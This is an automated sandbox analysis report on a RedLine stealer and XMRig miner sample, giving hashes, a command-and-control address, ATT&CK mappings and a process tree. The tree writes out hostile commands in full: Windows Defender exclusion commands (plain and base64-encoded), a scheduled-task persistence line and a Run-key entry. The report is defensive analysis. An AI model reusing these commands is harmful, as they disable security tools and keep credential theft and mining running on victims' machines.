redline | 067b704b54f19baef687e3e3f4ac845283b1f670752df309e6eb143565851da6

Analysis

max time kernel
148s
max time network
124s
platform
windows7_x64
resource
win7-en-20211208
submitted
28-01-2022 06:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ba48cbe3330971221c4c9c406a30ef6f.exe
Size

1.2MB
MD5

ba48cbe3330971221c4c9c406a30ef6f
SHA1

d766e0b0a7108d201490b256d5164c087ee13715
SHA256

067b704b54f19baef687e3e3f4ac845283b1f670752df309e6eb143565851da6
SHA512

650e1e0d9bcb1f6f1b123b1782e16fb2a03c8cb034e23b9ff4875572978fa36b3573a65c983555e87ca2adb93adc9dc10e868baa77570620c03e9897ed8a678d

Score

10^/10

redline xmrig discovery evasion infostealer miner persistence spyware stealer themida trojan

Malware Config

Extracted

Family

redline

185.105.119.120:48759

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/648-60-0x0000000000400000-0x000000000046C000-memory.dmp	family_redline
behavioral1/memory/648-61-0x0000000000400000-0x000000000046C000-memory.dmp	family_redline
behavioral1/memory/648-62-0x0000000000400000-0x000000000046C000-memory.dmp	family_redline
behavioral1/memory/648-64-0x0000000000400000-0x000000000046C000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 11 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1876-142-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/1876-143-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/1876-144-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/1876-145-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/1876-146-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/1876-147-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/1876-148-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/1876-149-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/1876-150-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/1876-151-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral1/memory/1876-153-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig

Downloads MZ/PE file
Executes dropped EXE 5 IoCs

Processes:

fl.exesadido.exevjdrgrgr.exeaddttc.exesihost64.exe

pid process

1940 fl.exe
1684 sadido.exe
1512 vjdrgrgr.exe
1416 addttc.exe
1564 sihost64.exe

pid	process
1940	fl.exe
1684	sadido.exe
1512	vjdrgrgr.exe
1416	addttc.exe
1564	sihost64.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

vjdrgrgr.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	vjdrgrgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	vjdrgrgr.exe

Loads dropped DLL 11 IoCs

Processes:

RegAsm.execmd.execmd.exeWerFault.execmd.exeaddttc.exe

pid process

648 RegAsm.exe
1244 cmd.exe
1748 cmd.exe
1748 cmd.exe
1252
868 WerFault.exe
868 WerFault.exe
868 WerFault.exe
868 WerFault.exe
1540 cmd.exe
1416 addttc.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 12 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\vjdrgrgr.exe	themida
C:\Users\Admin\AppData\Local\Temp\vjdrgrgr.exe	themida
\Users\Admin\AppData\Local\Temp\vjdrgrgr.exe	themida
C:\Users\Admin\AppData\Local\Temp\vjdrgrgr.exe	themida
\Users\Admin\AppData\Local\Temp\vjdrgrgr.exe	themida
behavioral1/memory/1512-77-0x000000013FC60000-0x000000014008E000-memory.dmp	themida
behavioral1/memory/1512-76-0x000000013FC60000-0x000000014008E000-memory.dmp	themida
behavioral1/memory/1512-78-0x000000013FC60000-0x000000014008E000-memory.dmp	themida
\Users\Admin\AppData\Local\Temp\vjdrgrgr.exe	themida
\Users\Admin\AppData\Local\Temp\vjdrgrgr.exe	themida
\Users\Admin\AppData\Local\Temp\vjdrgrgr.exe	themida
\Users\Admin\AppData\Local\Temp\vjdrgrgr.exe	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

vjdrgrgr.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe"	vjdrgrgr.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

vjdrgrgr.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA vjdrgrgr.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	vjdrgrgr.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

ba48cbe3330971221c4c9c406a30ef6f.exeaddttc.exe

description	pid	process	target process
PID 1264 set thread context of 648	1264	ba48cbe3330971221c4c9c406a30ef6f.exe	RegAsm.exe
PID 1416 set thread context of 1876	1416	addttc.exe	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

868 1512 WerFault.exe vjdrgrgr.exe

pid	pid_target	process	target process
868	1512	WerFault.exe	vjdrgrgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1044 schtasks.exe

pid	process
1044	schtasks.exe

Suspicious behavior: EnumeratesProcesses 31 IoCs

Processes:

RegAsm.exeWerFault.exepowershell.exepowershell.exepowershell.exepowershell.exesadido.exepowershell.exepowershell.exeaddttc.exeexplorer.exe

pid	process
648	RegAsm.exe
648	RegAsm.exe
648	RegAsm.exe
648	RegAsm.exe
648	RegAsm.exe
868	WerFault.exe
868	WerFault.exe
868	WerFault.exe
868	WerFault.exe
868	WerFault.exe
936	powershell.exe
324	powershell.exe
960	powershell.exe
528	powershell.exe
1684	sadido.exe
1088	powershell.exe
1072	powershell.exe
1416	addttc.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

464

pid	process
464

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

RegAsm.exeWerFault.exepowershell.exepowershell.exepowershell.exepowershell.exesadido.exepowershell.exepowershell.exeaddttc.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	648	RegAsm.exe
Token: SeDebugPrivilege	868	WerFault.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeDebugPrivilege	324	powershell.exe
Token: SeDebugPrivilege	960	powershell.exe
Token: SeDebugPrivilege	528	powershell.exe
Token: SeDebugPrivilege	1684	sadido.exe
Token: SeDebugPrivilege	1088	powershell.exe
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeDebugPrivilege	1416	addttc.exe
Token: SeLockMemoryPrivilege	1876	explorer.exe
Token: SeLockMemoryPrivilege	1876	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ba48cbe3330971221c4c9c406a30ef6f.exeRegAsm.exefl.execmd.execmd.execmd.exevjdrgrgr.exesadido.execmd.execmd.exe

description	pid	process	target process
PID 1264 wrote to memory of 648	1264	ba48cbe3330971221c4c9c406a30ef6f.exe	RegAsm.exe
PID 1264 wrote to memory of 648	1264	ba48cbe3330971221c4c9c406a30ef6f.exe	RegAsm.exe
PID 1264 wrote to memory of 648	1264	ba48cbe3330971221c4c9c406a30ef6f.exe	RegAsm.exe
PID 1264 wrote to memory of 648	1264	ba48cbe3330971221c4c9c406a30ef6f.exe	RegAsm.exe
PID 1264 wrote to memory of 648	1264	ba48cbe3330971221c4c9c406a30ef6f.exe	RegAsm.exe
PID 1264 wrote to memory of 648	1264	ba48cbe3330971221c4c9c406a30ef6f.exe	RegAsm.exe
PID 1264 wrote to memory of 648	1264	ba48cbe3330971221c4c9c406a30ef6f.exe	RegAsm.exe
PID 1264 wrote to memory of 648	1264	ba48cbe3330971221c4c9c406a30ef6f.exe	RegAsm.exe
PID 1264 wrote to memory of 648	1264	ba48cbe3330971221c4c9c406a30ef6f.exe	RegAsm.exe
PID 1264 wrote to memory of 648	1264	ba48cbe3330971221c4c9c406a30ef6f.exe	RegAsm.exe
PID 1264 wrote to memory of 648	1264	ba48cbe3330971221c4c9c406a30ef6f.exe	RegAsm.exe
PID 1264 wrote to memory of 648	1264	ba48cbe3330971221c4c9c406a30ef6f.exe	RegAsm.exe
PID 648 wrote to memory of 1940	648	RegAsm.exe	fl.exe
PID 648 wrote to memory of 1940	648	RegAsm.exe	fl.exe
PID 648 wrote to memory of 1940	648	RegAsm.exe	fl.exe
PID 648 wrote to memory of 1940	648	RegAsm.exe	fl.exe
PID 1940 wrote to memory of 876	1940	fl.exe	cmd.exe
PID 1940 wrote to memory of 876	1940	fl.exe	cmd.exe
PID 1940 wrote to memory of 876	1940	fl.exe	cmd.exe
PID 1940 wrote to memory of 876	1940	fl.exe	cmd.exe
PID 1940 wrote to memory of 1748	1940	fl.exe	cmd.exe
PID 1940 wrote to memory of 1748	1940	fl.exe	cmd.exe
PID 1940 wrote to memory of 1748	1940	fl.exe	cmd.exe
PID 1940 wrote to memory of 1748	1940	fl.exe	cmd.exe
PID 1940 wrote to memory of 1244	1940	fl.exe	cmd.exe
PID 1940 wrote to memory of 1244	1940	fl.exe	cmd.exe
PID 1940 wrote to memory of 1244	1940	fl.exe	cmd.exe
PID 1940 wrote to memory of 1244	1940	fl.exe	cmd.exe
PID 1244 wrote to memory of 1684	1244	cmd.exe	sadido.exe
PID 1244 wrote to memory of 1684	1244	cmd.exe	sadido.exe
PID 1244 wrote to memory of 1684	1244	cmd.exe	sadido.exe
PID 1244 wrote to memory of 1684	1244	cmd.exe	sadido.exe
PID 1748 wrote to memory of 1512	1748	cmd.exe	vjdrgrgr.exe
PID 1748 wrote to memory of 1512	1748	cmd.exe	vjdrgrgr.exe
PID 1748 wrote to memory of 1512	1748	cmd.exe	vjdrgrgr.exe
PID 1748 wrote to memory of 1512	1748	cmd.exe	vjdrgrgr.exe
PID 876 wrote to memory of 936	876	cmd.exe	powershell.exe
PID 876 wrote to memory of 936	876	cmd.exe	powershell.exe
PID 876 wrote to memory of 936	876	cmd.exe	powershell.exe
PID 876 wrote to memory of 936	876	cmd.exe	powershell.exe
PID 1512 wrote to memory of 868	1512	vjdrgrgr.exe	WerFault.exe
PID 1512 wrote to memory of 868	1512	vjdrgrgr.exe	WerFault.exe
PID 1512 wrote to memory of 868	1512	vjdrgrgr.exe	WerFault.exe
PID 876 wrote to memory of 324	876	cmd.exe	powershell.exe
PID 876 wrote to memory of 324	876	cmd.exe	powershell.exe
PID 876 wrote to memory of 324	876	cmd.exe	powershell.exe
PID 876 wrote to memory of 324	876	cmd.exe	powershell.exe
PID 1684 wrote to memory of 892	1684	sadido.exe	cmd.exe
PID 1684 wrote to memory of 892	1684	sadido.exe	cmd.exe
PID 1684 wrote to memory of 892	1684	sadido.exe	cmd.exe
PID 892 wrote to memory of 960	892	cmd.exe	powershell.exe
PID 892 wrote to memory of 960	892	cmd.exe	powershell.exe
PID 892 wrote to memory of 960	892	cmd.exe	powershell.exe
PID 892 wrote to memory of 528	892	cmd.exe	powershell.exe
PID 892 wrote to memory of 528	892	cmd.exe	powershell.exe
PID 892 wrote to memory of 528	892	cmd.exe	powershell.exe
PID 1684 wrote to memory of 716	1684	sadido.exe	cmd.exe
PID 1684 wrote to memory of 716	1684	sadido.exe	cmd.exe
PID 1684 wrote to memory of 716	1684	sadido.exe	cmd.exe
PID 716 wrote to memory of 1044	716	cmd.exe	schtasks.exe
PID 716 wrote to memory of 1044	716	cmd.exe	schtasks.exe
PID 716 wrote to memory of 1044	716	cmd.exe	schtasks.exe
PID 1684 wrote to memory of 1540	1684	sadido.exe	cmd.exe
PID 1684 wrote to memory of 1540	1684	sadido.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\ba48cbe3330971221c4c9c406a30ef6f.exe
"C:\Users\Admin\AppData\Local\Temp\ba48cbe3330971221c4c9c406a30ef6f.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1264

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
2⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:648

C:\Users\Admin\AppData\Local\Temp\fl.exe
"C:\Users\Admin\AppData\Local\Temp\fl.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1940

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:876

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:324

C:\Windows\SysWOW64\cmd.exe
cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\vjdrgrgr.exe"
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1748

C:\Users\Admin\AppData\Local\Temp\vjdrgrgr.exe
"C:\Users\Admin\AppData\Local\Temp\vjdrgrgr.exe"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1512 -s 252
6⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:868

C:\Windows\SysWOW64\cmd.exe
cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\sadido.exe"
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1244

C:\Users\Admin\AppData\Local\Temp\sadido.exe
"C:\Users\Admin\AppData\Local\Temp\sadido.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1684

C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
6⤵
- Suspicious use of WriteProcessMemory
PID:892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:528

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "addttc" /tr "C:\Users\Admin\AppData\Roaming\addttc.exe"
6⤵
- Suspicious use of WriteProcessMemory
PID:716

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "addttc" /tr "C:\Users\Admin\AppData\Roaming\addttc.exe"
7⤵
- Creates scheduled task(s)
PID:1044

C:\Windows\system32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\addttc.exe"
6⤵
- Loads dropped DLL
PID:1540

C:\Users\Admin\AppData\Roaming\addttc.exe
C:\Users\Admin\AppData\Roaming\addttc.exe
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1416

C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
8⤵
PID:1956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
9⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
9⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1072

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
8⤵
- Executes dropped EXE
PID:1564

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "xdbhhdrnm"
9⤵
PID:1324

C:\Windows\explorer.exe
C:\Windows\explorer.exe emyvmbcfz0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJS6kTcb2sZJ49Q3iSMDc1H0Gsol2ut25e0CiIvlYsuJiXFNJ4PET7Ssvm1Yua5cY1gF/Y8hpN2zPh3OaRZ3vTM5meO5JS5Nw3rXgdh0GbN9rnLxmH7ugFyhTdsZk/Jbs906EblI/VcGrhxHe9//FVV295PfmP2APVTPyGE5n4d3j3YxbmXRlVnCadTqKB6h+W6bYTAFBhewEjPxeF8UBT9yBch60hJayzqodyvRT6F8pllEZrOLuELWvI14PJOL1Vvh+YVDlxIOxBBMgzbblSfrfPS/WnuHafdsuYxQLX1UZN0xZNEgnLfciGlNOoMrtY7+oQD/xa69guncIxF58hUGpqkU/oM4NXAg8j/FCdJkscrfRIUYrgQEagnYsDDa1qzH/HmXj02FcYwoJXTor5ytwePPi1V/Ad+SfvSPYLKTSw==
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1876

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\fl.exe
MD5
02a3c2d3f197ed23fc0a5ef370bb28ca

SHA1
2be53d774b008e125b456bc40beb92e9019a49a5

SHA256
e2f4f19d9b41b76aeef1345d8f78b32e190c682bafb8b9ebea7d72681cf00db6

SHA512
6df48a9ce6cbe742f63119b88212bfe1ba7775ad9134d57ba5a4f6b23c326aa3b4615728bb424eedb406a088122c06446227a182368293d5ee8528424d375001

Download Submit
C:\Users\Admin\AppData\Local\Temp\sadido.exe
MD5
11c77dd72c33fb35a05f4822543d685e

SHA1
e511606a0fd8642b31c2649ccb6848a43cab4ddb

SHA256
867bb0c22b82237157584018bb4d071f3a56246b1ebb8b48bb0de7e04fa5bf14

SHA512
0d3f2a95c8a1d44219b3220045f808926089167d4eb7378f6f8f56650bdb7805e0fd10d203513dda8be1f0656173f5c47754ca7dd30300bade9f02dcf8d2de19

Download Submit
C:\Users\Admin\AppData\Local\Temp\sadido.exe
MD5
11c77dd72c33fb35a05f4822543d685e

SHA1
e511606a0fd8642b31c2649ccb6848a43cab4ddb

SHA256
867bb0c22b82237157584018bb4d071f3a56246b1ebb8b48bb0de7e04fa5bf14

SHA512
0d3f2a95c8a1d44219b3220045f808926089167d4eb7378f6f8f56650bdb7805e0fd10d203513dda8be1f0656173f5c47754ca7dd30300bade9f02dcf8d2de19

Download Submit
C:\Users\Admin\AppData\Local\Temp\vjdrgrgr.exe
MD5
06c33b534fba708316dd38f923a83480

SHA1
ddb73f7337bfd95ff5da4ffda17fe0d7a3907596

SHA256
c8089ee81a2dc40b068a49ad9b30f1d75edeee6e8c62df1f70ba4dd5394b4777

SHA512
05d1c579b0292c893cf8f82c5149f9a2ba080a47e9bc495c40165f763f3a5256508aeccf67e45133a3890143069b7a2e7d9442c7247aecd93d303a040f3dbf31

Download Submit
C:\Users\Admin\AppData\Local\Temp\vjdrgrgr.exe
MD5
06c33b534fba708316dd38f923a83480

SHA1
ddb73f7337bfd95ff5da4ffda17fe0d7a3907596

SHA256
c8089ee81a2dc40b068a49ad9b30f1d75edeee6e8c62df1f70ba4dd5394b4777

SHA512
05d1c579b0292c893cf8f82c5149f9a2ba080a47e9bc495c40165f763f3a5256508aeccf67e45133a3890143069b7a2e7d9442c7247aecd93d303a040f3dbf31

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
MD5
9c4a43965cf91e31d4430b5f164b4cb4

SHA1
b15d2cd55bcb1f703534c9a7bf44ecdaf6b258bd

SHA256
8fe263c13a5ba718631b170835e1f14b758f50b780b742875dec0660dd3acb85

SHA512
ed8bc419a3d5f55df2deb6406909c4f0bf55f54e528fbc0f8f5cd15da111b6ca4732ac184897eea94a3d4efdbec6cb1a014ca2ff845bf853dcf2bbec379f0a0d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
6aa5963540fb7a70b009839455c11db2

SHA1
892454ec68d834a5e1968e11e9fc7d3631ad0b20

SHA256
dd00146deaeef30f1d63de1b10bc919600af90c3b388857cd4e3c5f373ab5620

SHA512
49a7c949fcd8536bf20bf24d155347f86cf2ffae696a6b488db0d4faa0f04dd7a5e4245053d58c8387342ed8976eb0d9eed95bcd953f8459d6607e368a4228d9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
d4db3146c8f63a4b85fac501c0995aab

SHA1
0a0df1cef5cb6c577b89020d310f245f1215232c

SHA256
03e1bb2f22445fc06e8d6a2f49c37082dd611eb00b643365ffe963ff61616a4a

SHA512
f6fe453eb0d16a75c63961152f0c71e327d383187000afbf7493ba73b180a4659939519c9385c9ad11df383586a1ef200363f855f98a3b0441a0d4ecdf15da0e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
d4db3146c8f63a4b85fac501c0995aab

SHA1
0a0df1cef5cb6c577b89020d310f245f1215232c

SHA256
03e1bb2f22445fc06e8d6a2f49c37082dd611eb00b643365ffe963ff61616a4a

SHA512
f6fe453eb0d16a75c63961152f0c71e327d383187000afbf7493ba73b180a4659939519c9385c9ad11df383586a1ef200363f855f98a3b0441a0d4ecdf15da0e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
b68802c582e8cda538a4602151d7d207

SHA1
4c89d35fb292d601a4af295fb6c52cb0a361ce61

SHA256
4c11cc039e6b5bd2745604855dc33355f8fa62d0edea0a586e2b6c101cbb09e5

SHA512
479f699955a3425a8014f7a84d1f509fce23ddc1fb3789de40e8c6acc428330c9fc1e06c48d818a321b7d7575444c8a08a40b8e9e98a34031a0bef827584ef3a

Download Submit
C:\Users\Admin\AppData\Roaming\addttc.exe
MD5
11c77dd72c33fb35a05f4822543d685e

SHA1
e511606a0fd8642b31c2649ccb6848a43cab4ddb

SHA256
867bb0c22b82237157584018bb4d071f3a56246b1ebb8b48bb0de7e04fa5bf14

SHA512
0d3f2a95c8a1d44219b3220045f808926089167d4eb7378f6f8f56650bdb7805e0fd10d203513dda8be1f0656173f5c47754ca7dd30300bade9f02dcf8d2de19

Download Submit
C:\Users\Admin\AppData\Roaming\addttc.exe
MD5
11c77dd72c33fb35a05f4822543d685e

SHA1
e511606a0fd8642b31c2649ccb6848a43cab4ddb

SHA256
